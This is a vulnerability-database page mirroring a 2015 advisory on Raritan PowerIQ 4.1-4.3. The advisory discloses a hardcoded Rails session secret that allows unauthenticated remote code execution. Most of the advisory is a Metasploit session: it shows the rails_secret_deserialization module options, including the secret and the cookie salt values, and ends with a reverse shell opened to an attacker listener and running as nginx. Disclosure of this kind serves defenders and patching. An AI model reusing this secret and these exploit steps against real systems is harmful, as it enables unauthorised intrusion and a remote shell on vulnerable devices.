Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution

🗓️ 12 Mar 2015 00:00:00Reported by Brandon PerryType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Raritan PowerIQ 4.1 / 4.2 / 4.3 Code Execution vulnerability in Rails 2 interface with hardcoded session secre

Code
`Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web  
interface with a hardcoded session secret  
of 8e238c9702412d475a4c44b7726a0537.  
  
This can be used to achieve unauthenticated remote code execution as the  
nginx user on vulnerable systems.  
  
msf exploit(rails_secret_deserialization) > show options  
  
Module options (exploit/multi/http/rails_secret_deserialization):  
  
Name Current Setting  
  
Required Description  
---- ---------------  
  
-------- -----------  
COOKIE_NAME  
  
no The name of the  
session cookie  
DIGEST_NAME SHA1  
  
yes The digest type  
used to HMAC the session cookie  
HTTP_METHOD GET  
  
yes The HTTP request  
method (GET, POST, PUT typically work)  
Proxies  
  
no A proxy chain of  
format type:host:port[,type:host:port][...]  
RAILSVERSION 3  
  
yes The target Rails  
Version (use 3 for Rails3 and 2, 4 for Rails4)  
RHOST 192.168.0.20  
  
yes The target address  
RPORT 443  
  
yes The target port  
SALTENC  
BAh7CUkiCXNrZXkGOgZFRkkiFTgzMzVmNDY2ZDdmOTI2Y2IGOwBUSSINbGljZW5zZWQGOwBGVEkiD3Nlc3Npb25faWQGOwBUSSIlNGJlNzA2Nzk2NWFjYjFmNzU2ZThiY2IyNGVkNWM0MDMGOwBUSSIOcmV0dXJuX3RvBjsARiIGLw==  
yes The encrypted cookie salt  
SALTSIG 42df31d8a91b45e5ad3e9f3213dc5d6859df1cf8  
  
yes The signed  
encrypted cookie salt  
SECRET 8e238c9702412d475a4c44b7726a0537  
  
yes The secret_token  
(Rails3) or secret_key_base (Rails4) of the application (needed to sign the  
cookie)  
TARGETURI /login/login  
  
yes The path to a  
vulnerable Ruby on Rails application  
VALIDATE_COOKIE true  
  
no Only send the  
payload if the session cookie is validated  
VHOST  
  
no HTTP server  
virtual host  
  
  
Exploit target:  
  
Id Name  
-- ----  
0 Automatic  
  
  
msf exploit(rails_secret_deserialization) > exploit  
  
[*] Started reverse handler on 192.168.0.19:4444  
[*] Checking for cookie  
[*] Adjusting cookie name to _session_id  
[+] SECRET matches! Sending exploit payload  
[*] Sending cookie _session_id  
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.20:43729)  
at 2015-03-11 19:45:20 -0500  
  
id  
uid=498(nginx) gid=498(nginx) groups=498(nginx),100(users)  
  
--   
http://volatile-minds.blogspot.com -- blog  
http://www.volatileminds.net -- website  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Mar 2015 00:00Current
0.2Low risk
Vulners AI Score0.2
raritan poweriqcode executionrails 2remote code executionvulnerable systemsnginx userexploitsession cookierails versioncookie saltcookie secrettarget uriruby on railsexploit target
18